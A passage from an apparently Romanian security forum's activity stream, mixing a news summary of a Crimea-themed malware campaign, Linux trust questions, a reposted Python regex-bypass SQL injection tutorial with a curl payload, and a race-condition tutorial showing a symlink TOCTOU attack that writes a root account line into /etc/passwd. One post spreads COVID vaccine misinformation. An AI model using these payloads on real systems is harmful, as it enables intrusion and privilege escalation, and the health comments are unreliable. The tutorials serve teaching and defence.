Jump to content
The search index is currently processing. Activity stream results may not be complete.

All Activity

This stream auto-updates

  1. Today
  2. The Malwarebytes report said a new threat actor may be targeting Russian and pro-Russian individuals. Hossein Jazi and Malwarebytes' Threat Intelligence team released a report on Thursday highlighting a new threat actor potentially targeting Russian and pro-Russian individuals. The attackers included a manifesto about Crimea, indicating the attack may have been politically motivated. The attacks feature a suspicious document named "Manifest.docx" that uniquely downloads and executes double attack vectors: remote template injection and CVE-2021-26411, an Internet Explorer exploit. Jazi attributed the attack to the ongoing conflict between Russian and Ukraine, part of which centers on Crimea. The report notes that cyberattacks on both sides have been increasing. But Jazi does note that the manifesto and Crimea information may be used as a false flag by the threat actors. Malwarebytes' Threat Intelligence team discovered the "Манифест.docx" ("Manifest.docx") on July 21, finding that it downloads and executes the two templates: one is macro-enabled and the other is an html object that contains an Internet Explorer exploit. The analysts found that the exploitation of CVE-2021-26411 resembled an attack launched by the Lazarus APT. According to the report, the attackers combined social engineering and the exploit in order to increase their chances of infecting victims. Malwarebytes was not able to attribute the attack to a specific actor, but said that a decoy document was displayed to victims that contained a statement from a group associating with a figure named Andrey Sergeevich Portyko, who allegedly opposes Russian President Vladimir Putin's policies on the Crimean Peninsula. Jazi explained that the decoy document is loaded after the remote templates are loaded. The document is in Russian but is also translated into English. The attack also features a VBA Rat that collects victim's info, identifies the AV product running on victim's machine, executes shell-codes, deletes files, uploads and downloads files while also reading disk and file systems information. Jazi noted that instead of using well known API calls for shell code execution which can easily get flagged by AV products, the threat actor used the distinctive EnumWindows to execute its shell-code. Via zdnet.com
  3. Yesterday
  4. Last week
  5. valabil si doctorul Fauci la comentarii: James 2 hours ago So he basically says the vaccine doesn’t work for the delta variant, but the blame is on the people who won’t get the vaccine (which doesn’t work). He must think we’re complete idiots at this point. marcus 19 minutes ago You have to take into account that there is literally brain dead sick people everywhere who still worship and follow this crap. in curand in Romenistan: CDC recomandă, din nou, purtarea măștii în interior, chiar și pentru vaccinați. Statele americane fără mască au avut mai puține cazuri de Covid decât cele cu mască. Contradicțiile lui Fauci. BOMBĂ: CDC renunță la metoda de diagnosticare RT-PCR Un editorial excepțional al lui Tucker Carlson,de  la Fox News
  6. Nu pot sa cred...wtf... :( ms. Edit : rezolvat
  7. vezi in sectiunea de stiri PS: bine ca nu ti-ai lasat adersa
  8. Salut, de la ce ar putea fi aceasta eroare An error 500 occurred on server cand verific adresa? https://www.blockchain.com/btc/address/bc1qq9tk3uhcx58y5qvmzs50nhs49m0pdkmrfpkzs4
  9. Nu ar strica ceva detalii suplimentare. Public sau in privat. Nume program, producator, link descarcare daca (mai) exista, etc. Licentierea programelor este, in general, un aspect sensibil al dezvoltatorilor de software. Unii folosesc tehnologii realizate de altii pentru licentierea propriilor produse, unii se bazeaza pe propria inteligenta/creativitate. Depinde foarte mult daca licenta achizitionata este (sau era) legata de o anumita platforma hardware (hardware ID, serie HDD ...), daca se asteapta vreun raspuns de pe un server online etc. Exista o multitudine de modalitati de licentiere astfel incat fara detalii suplimentare nu cred ca putem veni cu solutia salvatoare. Solutie care poate exista ... sau nu.
  10. Nu prea ai ce sa faci daca functionalitatea programului nu permite activarea licentei. Poti incerca sa dai ceasul cu cativa ani inapoi dar sunt slabe sanse sa functioneze (ulterior il dai inapoi). O versiune mai noua a programului nu si-ar face treaba? Poate poti discuta cu producatorul sa iti dea una noua
  11. 8DAF2JRHC U23W5P9IO IUE44GN3D 41MW71AC3 YL6UZRW51 J0O5RAGH7 QRVL118JU HTTP bandwidth usage stats
  12. folosit HHRLE5O6Y alte noi aici HDTWTTEWS DMRDLEQ9Z G0B5JFA2S 3P69SNBTG 5X19KVFFX IHNIK916I 3SZ1SB8OH
  13. https://www.debian.org/CD/verify Majoritatea distro vin cu signed checksums. Tu descarci fisierele, le calculezi hasul(local, la tine pe pc) si verifici daca hasul calculat e la fel cu cel oficial, semnat de catre autor. Asa stii 100% ca ce ai descarcat tu e varianta oficiala, fara modificari de la parte terte. Daca ai incredere sau nu in autori, problema e mult mai complicata. Unele distro au codul sursa public, au audite de securitate independente, sunt folosite de catre companii mari, in situatii safety-critical. Toate aceste aspecte inspira incredere, dar nu poti fi niciodata 100% sigur. Poate exista un Remote Code Execution in nucleul UNIX. Poate exista un exploit in hardware de la network card. La polul extrem: poti avea incredere in "process monitor" sau "firewall"? Poate ele insele sunt virusate! Pe scurt: Nu-ti fura nimeni aia 10$ din pariuri sportive sau forex pe care ii investesti in crypto auto-trading. Ii scoti repede prin off-shore si ii bagi in cabinetul de stomatologie. As pune pariu ca bot-ul tau o sa-ti piarda banii in margin trades. Bafta!
  14. Am vazut pe Youtube ca la rulare normala foloseste maxim 95-100Mb RAM si nici nu ocupa foarte mult spatiu pe disc si m-am gandit ca e numai buna pentru a rula pe un PC micro/portabil/de buzunar pe care sa-l lasi deschis undeva pe sifonier si sa uiti de el. Mai sunt si altele dar din cate vad in testele de pe Youtube se blocheaza si nu se misca asa de rapid ca asta. Eu nu ma refer sa fie cu backdoor de la institutii guvernamentale ci sa aiba prin vreun pachet instalat sau printr-o librarie .so ceva cod malware special pus chiar de cei care o fac, in exemplul de fata astia care au si situl respectiv. Dar nu este vreun fel de process monitor ca sa vezi ce face fiecare proces care ruleaza si ce fisiere accesteaza/sterge/creaza/descarca runtime? Tot la fel, nu exista vreun fel de firewall care sa verifice exact ce fisier ce host vrea sa acceseze? Dar un antivirus bun pe care sa te bazezi nu exista pentru linux? Multumesc mult!
  15. Daca vrei sa rulezi nu stiu ce bot de crypto, nu cred ca trebuie sa iti faci griji ca NSA-ul a pus ceva backdoor acolo, nu prea o sa ii pese daca nu esti cine stie ce persoana importanta la nivel mondial (e.g. directorul unei centrale nucelare din Iran). Ca sa o securizezi e destul de simplu: 1. Faci update cat se poate de des 2. Nu instalezi toate mizeriile 3. Scoti lucrurile de care nu ai nevoie, precum servicii pe care nu le foloseti 4. Lasi doar SSH, auth cu cheie si gata 5. Poti face multe lucruri de hardening dar nu prea ai nevoie Daca vrei, poti verifica o distributie de Linux si poti fi sigur ca nu are niciun backdoor, doar ca va dura cateva mii de ani: 1. Iei tot codul sursa si il compilezi 2. Face reproductible build daca se poate, daca nu faci diff-uri intre ce ai tu pe distributie si ce se compileaza 3. Verifici toate diferentele (o sa fie) datorate unor patch-uri, modificari sau configurari 4. Verifici tot codul sursa de la kernel la toate programele instalate si vezi sa nu aiba backdoor 5. Bonus: Cauti si vulnerabilitati cand faci asta Acum mai serios, nu prea ai ce face tu, o persoana, individual. Daca s-ar aduna cateva mii de persoane s-ar putea face asa ceva dar tot ar dura luni sau chiar ani (fara sa se faca vreo actualizare in acest timp). Cat despre distributia respectiva, nu am auzit de ea, de ce ai ales-o? De ce nu ceva "clasic": debian, centos, ubuntu, kali etc.?
  16. Sa zicem ca ti-ai instalat pe PC o distributie de linux. Cum poti sti/verifica daca are backdoors sau programe de spionaj sau password stealers preinstalate sau facut cumva sa ti le descarce la scurt timp dupa ce tocmai ai instalat sistemul de operare pe harddisk? Presupunand de dragul discutiei ca vrei sa rulezi nonstop un trading bot de crypto de exemplu (cum deja a si postat cineva pe forum unul de acest gen) si care functioneaza doar pe linux. Cum faci? Cum verifici ca sa iti dai seama daca este ceva in neregula sau nu sau cum o securizezi? Astea pot parea intrebari de paranoia dar sa nu uitam ca la un momentdat in codul sursa al unui client de torrente era un cod de bitcoin mining si au recunoscut mai tarizu acest lucru deci orice este posibil. Plus, in alta ordine de idei si legat oarecum de subiect, ce parere aveti despre aceasta distriubutie de linux? https://puppylinux.com/ Este de incredere?
  17. am rugamintea de a ma informa daca ma poate ajuta cineva cu setarea intr-un program ptr ca nu imi functioneaza licenta achizitionata si producatorul nu mai ofera suport fiind mult prea veche Este vb de setare a vechii licente si nicidecum de crackuirea vreunui program Multumesc
  18. Pentru ca nu sunt banii tai, daca nu ai semnatura digitala (PGP) iti iei adio de la ei
  19. Registry Explorer Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include: Show real Registry (not just the standard one) Sort list view by any column Key icons for hives, inaccessible keys, and links Key details: last write time and number of keys/values Displays MUI and REG_EXPAND_SZ expanded values Full search (Find All / Ctrl+Shift+F) Enhanced hex editor for binary values Undo/redo Copy/paste of keys/values Optionally replace RegEdit more to come! Build instructions Build the solution file with Visual Studio 2022 preview. Can be built with Visual Studio 2019 as well (change toolset to v142). Sursa: https://github.com/zodiacon/RegExp
  20. A Python Regular Expression Bypass Technique One of the most common ways to check a user's input is to test it against a Regular Expression. The Python module RE provides easy and very powerful functions to check if a particular string matches a given regular expression (or if a given regular expression matches a particular string, which comes down to the same thing). Sometimes, functions included in Python RE are either misused or not very well understood by developers and when you see this it can be possible to bypass weak input validation functions. TL;DR using python re.match() function to validate a user input can lead to bypass because it will only match at the beginning of the string and not at the beginning of each line. So, by converting a payload to multiline, the second line will be ignored by the function. This means that a weak validation function that prevents using special characters in a value (for example id=123), could be bypassed with something like id=123\n'+OR+1=1--. In this article I'll show you an example of bad usage of the re.match() function. [from search() vs. match()] Python offers two different primitive operations based on regular expressions: re.match() checks for a match only at the beginning of the string, while re.search() checks for a match anywhere in the string (this is what Perl does by default). For example: 1 >>> 2 >>> re.match("c", "abcdef") # No match 3 >>> re.search("c", "abcdef") # Match 4 <re.Match object; span=(2, 3), match='c'> Regular expressions beginning with '^' can be used with search() to restrict the match at the beginning of the string: 1 >>> 2 >>> re.match("c", "abcdef") # No match 3 >>> re.search("^c", "abcdef") # No match 4 >>> re.search("^a", "abcdef") # Match 5 <re.Match object; span=(0, 1), match='a'> As you can see, the first re.match didn't match because implicit anchors. Anchors do not match any character at all. Instead, they match a position before, after, or between characters. They can be used to “anchor” the regex match at a certain position (https://www.regular-expressions.info/anchors.html). Input Validation using re.match() Let say that I've got a Python flask web application that is vulnerable to SQL Injection. If I send an HTTP request for /news sending an article id number on the id argument, and a category name on the argument category, it returns me the content of that article. For example: 1 from flask import Flask 2 from flask import request 3 import re 4 5 app = Flask(__name__) 6 7 def is_valid_input(input): 8 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) 9 if m is not None: 10 return False 11 return True 12 13 @app.route('/news', methods=['GET', 'POST']) 14 def news(): 15 if request.method == 'POST': 16 if "id" in request.form: 17 if "category" in request.form: 18 if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]): 19 return f"OK: {request.form['category']}/{request.form['id']}" 20 else: 21 return f"Invalid value: {request.form['category']}/{request.form['id']}", 403 22 else: 23 return "No category parameter sent." 24 else: 25 return "No id parameter sent." By sending a request with id=123 and category=financial the application reply me with "200 OK" status code and "OK: financial/123" response body. As I said, the argument id is vulnerable to SQL Injection, so the developer has fixed it by creating a function to validate the user's input on both arguments (id and category) that prevents sending some characters like single and double quotes or strings like "select" or "union". As you can see, this webapp checks the user's input with the is_valid_input function at line 7: 1 def is_valid_input(input): 2 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) 3 if m is not None: 4 return False 5 return True the code above means: "if the value of any input contains double quote, or single quote, or semicolon, or equal character, or any of the following string: "select", "union", "from", "where", then discard it". Let's try it: By trying to inject SQL syntax on the value of argument id the webapp returns a 403 Forbidden status with "Invalid value" as response body. This thanks to the validation function that matches invalid characters in my payload such as single quote and equal. Input Validation Bypass From the RE module documentation, about the re.match() function: "... even in MULTILINE mode, re.match() will only match at the beginning of the string and not at the beginning of each line. If you want to locate a match anywhere in string, use search() instead (see also search() vs. match())." So, to bypass this kind of input validation we just need to convert the SQL Injection payload from single line to multiline by adding a \n between the numeric value and the SQL syntax. For example: If the question is "can SQL have a newline inside a SELECT?" the answer is yes it can. The hypothetical SQL syntax becomes something like the following: Let's do it on the vulnerable webapp: As shown in the screenshot, I just put a \n (not CRLF \r\n) after the id value and then I started my SQL Injection. The validation function just validate the first line, so I bypassed it. Using curl: curl -s -d "id=123%0a'+OR+1=1--&category=test" 'http://localhost:5000/news' OK: test/123% Run it in your Lab First, download the vulnerable flask webapp source code from here: from flask import Flask from flask import request import re app = Flask(__name__) def is_valid_input(input😞 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) if m is not None: return False return True @app.route('/news', methods=['GET', 'POST']) def news(): if request.method == 'POST': if "id" in request.form: if "category" in request.form: if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]): return f"OK: {request.form['category']}/{request.form['id']}" else: return f"Invalid value: {request.form['category']}/{request.form['id']}", 403 else: return "No category parameter sent." else: return "No id parameter sent." view rawapp.py hosted with ❤ by GitHub then start flask webserver with: flask run Remediation First option is to do a positive validation instead of a negative one. Don't create a sort of deny-list of "not allowed words" or "not allowed characters" but check for expected value format. Example id=123 can be validated by ^[0-9]+$. Second option is to use re.search() instead of re.match() that check over the whole value and not just for the first line. Third option: don't create your own input validation function but try to find a widly used and mantained library that does it for you. Follow if you liked this post, follow me on twitter to keep in touch! https://twitter.com/AndreaTheMiddle Sursa: https://www.secjuice.com/python-re-match-bypass-technique/
  21. Winning the race: Signals, symlinks, and TOC/TOU Date: 23rd Jun 2021Author: uid00 Comments Introduction: So, before we dive right into things, just a few bits of advice; some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and also an understanding of how multi-threading and signal handlers work would be beneficial for readers to understand the concepts I’m going to be covering here, but if you can’t code then don’t worry as I’m sure you’ll still be able to grasp the concepts that I’m covering. That being said, having prior programming knowledge should give you a deeper understanding of how this actually works. It won’t kill you to read up on the subjects I just mentioned, and by you doing so, you will understand this tutorial a lot easier. Ideally, if you understand C/C++ and Assembly language, then you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger would also help. Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities taking place. That being said, when vulnerabilities do happen to arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (No Kidding!) Generally, within multi-threading, race conditions aren’t an issue in terms of exploitability but rather just an issue in terms of the intended program flow not going as planned (note ‘generally’, there can be exceptions where this can be used for exploitation rather than being a mere design issue). Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. In terms of paradigm, if your code is purely functional (I’m talking in terms of paradigm here, although I guess that particular use of terminology is interchangeable as if your code suffers from race condition flaws then it lacks functionality in the non-paradigm sense too) then race conditions will not occur. So, what exactly are race conditions? Let’s take a moment to sit back and enter the land of imagination. For the sake of this post, let’s pretend you’re not a fat nerd sitting in your Mom’s basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Lets imagine, just for one moment, that you’re someone else. You’re not just any old someone, no. You’re someone who does something important. You’re a world-class athlete. You spent the last 4 years training non-stop for the 100m Sprint, you are certain you are going to win the Gold Medal this year. The time finally comes. you are ready to race. During the sprint, you’re neck-to-neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow-motion to see who passed the finish line first, and unbelievably, you both passed the finish line at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you’re both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions! This is Part One of a Three-Part series diving into the subject of race conditions, there’s absolutely no way I can cover this whole subject in three blog posts. Try three books maybe! Race Conditions are a colossally huge subject with a wide variety of security implications ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series. While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it on the other hand is a bit more hit and miss, but I’ll get into that later). Race conditions stem from novice developers making the assumption that their code will execute in a linear fashion, or as a result of developers implementing multi-threading in an insecure manner. If their program then attempts to perform two or more operations at the same time then this can cause changes within the code flow of the program to end with undesirable results (or desirable, depending on whether you’re asking the attacker or the victim!). It should also be noted (as stated before) that race conditions aren’t necessarily always a security risk, in some cases they can just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race Conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, and I will mainly be talking about race conditions within web applications or within vulnerable C programs. The basic premise of a race condition bug is that two threads to “race” against eachother, allowing the winner of said race to manipulate the control flow of the vulnerable application. I’ll be touching lightly upon race conditions being present in multi-threaded applications and will give some brief examples, but this will mainly be focused on races as a result of signal handling, faulty access checks and symlink tricks. In addition to that, I’ll give some examples of how this class of bugs can be abused within Web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I’ll give a quick overview of the basics, which hopefully you can build upon with your own research. To give you a more simple analogy of what a race condition is, imagine you have online banking with a banking platform. Let’s assume you open two separate browser tabs at once, both with the payment page loaded, you then setup both browser tabs so that you’re ready to make your payment to another bank account —  if you were to then click the button to make the payment in both tabs at identical times, it could register that only one payment had been made, when in reality the payment had been made twice but only the money for one of the payments has been deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although this is highly unlikely to ever happen in a real world scenario. I’m going to demonstrate some code snippets to explain this, in order to show different kinds of races that are possible and give examples in various languages, but I’ll start pseudo-code : The code above is C-inspired pseudo-code The reason I gave the first example in C is because race conditions tend to be very common within vulnerable C applications. Specifically you should be looking for the signal.h header as this is generally a good indicator of a potential race condition bug being present within issues regarding signal handling at least). Another good indicator is if there are access checks present for files as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages, and explain context-specific race condition bugs associated with such languages. While this code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Lets assume an attacker sends two operations to the program at the same time, and the code flow states that if permitted, then execute the specified function. If timed correctly, an attacker could make it so that something is permitted at the time of check, but that thing may no longer be permitted at the time of use (this would be a TOC/TOU race — meaning “Time of Check / Time of Use”). So for example, we can assume that the following test is being ran: if (something_is_permitted) // check if permitted and the conditions for the if statement are met and the code flow will continue in the intended order, but when the function gets called, the thing that was not permitted is now considered to be permitted, so it will execute the following code: doThis(); This will result in unintended program flow and depending on the nature of the code it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc. The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I’ll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications. When most people think of Race Conditions, they imagine them to be something very fast-paced. People expect the timing required to execute a TOC/TOU race would need to be extremely precise. While this is often the case, it is not always the case. Consider the following example of a “slow-paced” race condition bug: There exists a social-networking application where users have the ability to edit their profile A user clicks the “edit profile” button and it opens up the webpage to allow them to make edits User then goes AFK (Away from Keyboard) The administrator finds an unrelated vulnerability in the profile editing section of the website, and as a result, locks down the edit functionality so that users can no longer edit their profile User returns, and still has the profile editing page open in a browser tab Despite new users not being able to access the “edit profile” page, this user already has the page opened and can continue to make edits despite the restriction put in place by the administrator Race Conditions can also take place as a result of latency within networks. Take an IRC for example, let’s assume that there is a hub and two linked nodes. Bob wants to register the channel #hax yet Alice also wants to register this same channel. Consider the following: Bob connects to IRC from node #1 Alice connects to the IRC from node #2 Bob runs /join #hax Alice runs /join #hax Both of these commands are ran from separate nodes at around the same time Bob becomes an operator of #hax Alice becomes an operator of #hax The reasoning for this, is, due to network latency, node #1 would not have time to send a signal to node #2 to alert it that the Services Daemon has already assigned operator status to another user on the same network. (PROTIP: When testing local desktop applications for Race Conditions - for example a compiled binary - use something like GDB or OllyDBG to set a breakpoint between TOC and TOU within the source code of the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO. This rings especially true with race conditions considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it) Symlinks and Flawed access checks: Using symlinks to trigger race conditions is a relatively common method. Here I will give a working example of this. The example will show how a symlink race can be used to exploit a badly implemented access check in C/C++ — this would allow an attacker to horizontally perform privilege escalation in order to get root on a server (assuming the server had a program that was vulnerable in this manner) — it should be noted that while writing to /etc/passwd in the manner I’m about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) perms to root-owned files that generally would not be accessible from a regular user account. This method assumes that the program in question is being ran with setuid access rights. The intended purpose of the program is that it will check whether you have permissions to write to a specific directory (via an access(); check) — if you have permission, it will write your user input to the directory of choice. If you don’t have permission, then the access(); check is intended to fail, indicating that you’re attempting to write to a directory or file of which you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc would require additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp where it has permission, when in fact it is writing to /etc where it lacks permissions In modern Linux Distributions (and in modern countermeasures implemented into languages such as C), there are ways of attempting to mitigate such an attack. For example, the POSIX C stdlib can use the mkstemp(); function as opposed to fwrite(); or fopen(); in order to create temporary files, and respectively mktemp(1) allows for creation of temporary files within *nix-based systems. Another attempt at mitigating this in *nix-based systems is the O_NOFOLLOW flag for open() calls — the purpose of this flag is to prevent files being opened by a symbolic link. Take a look at the following vulnerable code (this is a race condition between the original program and a malicious one which will be used): Example suid program vulnerable to a typical TOC/TOU symlink race condition through means of an insufficient access check. I will be compiling and running this from my user account with the following privs (non-root): First, I will demonstrate this using a debugger (GBD, although others such as OllyDbg will suffice too) because it allows you to pause the execution of the program allowing for race conditions to take place easier — in a real exploitation scenario you would need to trigger the race condition naturally which i will demonstrate next. First, disassemble the code using your debugger of choice: Now, set a breakpoint at fopen(); so we can demonstrate a race condition without actually having to go through the steps to trigger one naturally: break *0x80485ca Then replace the written file via a symbolic link like so: Now that you’ve paused the execution of the program flow through use of a breakpoint, resuming the program flow (after the symlink has been made) would cause the access check to be passed, meaning the program would continue to run as intended and would write some input to the file that would usually only be writeable had the access check been passed. Of course, using GDB or another debugger isn’t possible in real world scenarios, therefore it is relevant to implement something that will allow the race conditions to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing two options at the same time, until the race conditions are met. The following example will show how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race condition is successfully met, it will result in the access check being passed and will write a new entry to /etc/passwd Script #1: This script should be running repeatedly until the condition is met, that’s why it is re-executing itself within the while loop Script #2: This script will repeatedly be attempting to make a symbolic link to /etc/passwd After a while of both of these script running at the same time, it should eventually get the timing correct so that the symbolic link is made prior to completion of the access check, causing the access check to be bypassed and some data to be written to a previously restricted file (/etc/passwd in this case) If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs: raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh From here, they can simply use ‘su’ in order to authenticate as a root user with the new ‘raceme’ account that they have created by adding an entry to /etc/passwd g0t r00t!! Race Conditions within Signal Handling: If you do not understand the concept of Signal Handlers within programming then now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws. The most common occurrence of race conditions within Signal Handlers is when the same function installed as a signal handler is utilized for the handling of multiple different signals and when those different signals are called via the same signal handling function within a short time-frame of eachother (hence the race condition). “Non-Reentrant” Signals are the primary culprit that result in signal-based races posing an issue. If you’re unfamiliar with what the concept of non-reentrance is within Signal Handling, then I really do suggest reading into the topic in-depth, but if you’re like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology used to describe it alone is somewhat self-explanatory in all honesty). If a function has been installed with signal handling operations in mind, and if aforementioned function either maintains an internal state or calls another function that maintains an internal state then its a non-reentrant function and this means it has a higher probability of a race condition being a possibility. For an example demonstrating exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a “double free”. The following code examples shows how an attacker could craft a specifically timed payload – If you’re not spotting their common trend here, race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they’ll create a ghetto-style “loop” of sorts by having payload1.sh repeatedly execute payload2.sh which in turn will repeatedly execute payload1.sh and so on and so on. The reasoning for this is because in many contexts, for a race condition to be successful, the requests need to be made concurrently sometimes even down to the exact millisecond. Rather than executing their payload once and hoping they got their one-in-a-million chance of getting the timing exactly right it makes far more sense to use a loop to repeatedly execute the payload, as with each iteration of the loop, the attacker has another chance of getting the timing right. Pair this with methods of slowing down execution of certain processes and now the attacker has increased their window (the “window” in this instance referring to the viable time in which the race condition can occur, allowing the attack to be carried out). For example with a TOC/TOU Race, the “attack window” would be the time between the check taking place (hence “TOC” – “Time of Check”), and the timee when the action occurs (“TOU” – “Time of Use”) between the check being carried out again. The “attack window” in this instance is the time frame in which the check being carried out is saying that the actual occurring is permitted, which for a very short time period (or “window”) it is permitted… up until the iteration wherein the next check occurs, when the action is there no longer permitted meaning the window has closed. maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter here) making as many concurrent attempts at triggering the race within the time-frame dictated by the length of your attack window. Use multiple threads where possible. Testing manually with a debugger via setting breakpoint between TOC and TOU Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time) Below you can find an example of a Race Condition present via signal handling, with triggering of a double free as a Proof-of-Concept. This code example uses the same signal handler function which is non-reentrant and makes use of a shared state. The function in question is the free(); function, and in this code example an attacker could send two different signals to the same signal handler at the same time, resulting in memory corruption taking place as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation then you’re probably aware of the issues posed by a double free triggered as a result of calling free(); twice with the same argument. For those who are not aware, this is known as a “double free bug” and it results in the programs memory structures becoming corrupted which can cause a multitude of problems ranging from segfaults and crashes, to arbitrary code execution as a result of the attacker being able to control the data written into the memory region that has been doubly-allocated, resulting in a buffer overflow taking place. While the RCE triggered by the overflow which in turn was triggered by the double free… the double free itself is triggered as a restult of a race condition occuring due to two separate signals being sent to the free(); signal handler, which, withou getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants. The following code demonstrates this issue: #include <stdio.h> #include <vulnerable.lol> #define RACE_CONDITION LOL void vuln(int pwn) { // some lame program free(globvar); free(globvar2); // double free } int main(int argc,char* argv[]) { // overflowz and code exec signal(SIGHUP,vuln); signal(SIGTERM,vuln); // all due to a pesky race condition } There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits. Here is a list of reasons as to what could trigger a race condition via signal handling (from Mitre’s CWE Database): Shared state (e.g. global data or static variables) that are accessible to both a signal handler and “regular” code Shared state between a signal handler and other signal handlers Use of non-reentrant functionality within a signal handler – which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution. Association of the same signal handler function with multiple signals – which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses. Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses. Out of everything just listed, the most common reasons are either one signal handler is being used for multiple signals, or two or more signals arrive in short enough succession of eachother to fit the attack window for a TOCTOU race condition. Methods of slowing down process execution: Slowing down the execution process of the program is almost vital to effectively achieve race conditions more consistently, here I will describe somethe common methods that can be used to achieve this. Some of these methods are outdated and will only work on older sytems, but they are still worth including (especially if you’re into CTF’s) Deep symlink nesting (as described above) is one old method that can be used to slow down program execution in order to aid race conditions. Another method that can be used is by changing the values for the environment variable LD_DEBUG — setting this to a different value will result in output being sent to stderr, if you were to then redirect stderr to a pipe, it can slow down or completely halt the setuid bin in question. To do this you would do something as follows: LD_DEBUG=all;some_program 2>&1 Usage of LD_DEBUG is somewhat outdated, no longer relevant within setuid binaries since the upgrade to glibc 2.3.4 — that being said, this can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen as solutions for CTF’s Another method of slowing down program execution is by lowering its scheduling priority through use of the nice or renice commands. Technically, this isn’t slowing down the program execution as such, but it’s rather forcing the Linux scheduler to allocate less time frames towards the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice(); syscall. If the value for nice is a negative value, then the process will run with higher priority. If it is a positive value, then the process will run with lower priority. For example, setting the following value will cause the process to run at a ridiculously slow rate: nice(19) If you’re familiar with writing Linux rootkits, then you may already be aware of these methods, but you can use dynamic linker tricks via LD_PRELOAD in order to slow down the execution of processes too. This can be done by hooking common functions such as malloc(); or free(); then once said functions are called within the vulnerable program, their speed of execution will be slowed down to a nominal extent. One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you’re using a virtual machine, then there should be options available that will allow you to limit the allocated amount of CPU resources and RAM, allowing you to test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions. One crude method to slow down program/process executioon speeds in order to increase the chance of a race condition occuring is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device so don’t come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I’ve seen it done (which is, according to my crazy IRL hacker friend) is supposedly one of the safer methods of physically overheating your computer — simply wet a towel (or a bunch of towels) and wrap them around your device while making sure than the fan in particular is covered completely. Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions. This is a very old and well-documented method, although these days it is practically useless (unless you’re exploiting some old obscure system, or if you’re doing it for a CTF — I have seen this method utilized in CTF challenges before). Since Linux Kernel 2.4x, this method has been mitigated through implementation of a limit on the maximum number of symlink dereferences permitted during lookups alongside limits on nesting depths. Despite this method being practically dead, I figured it’s still 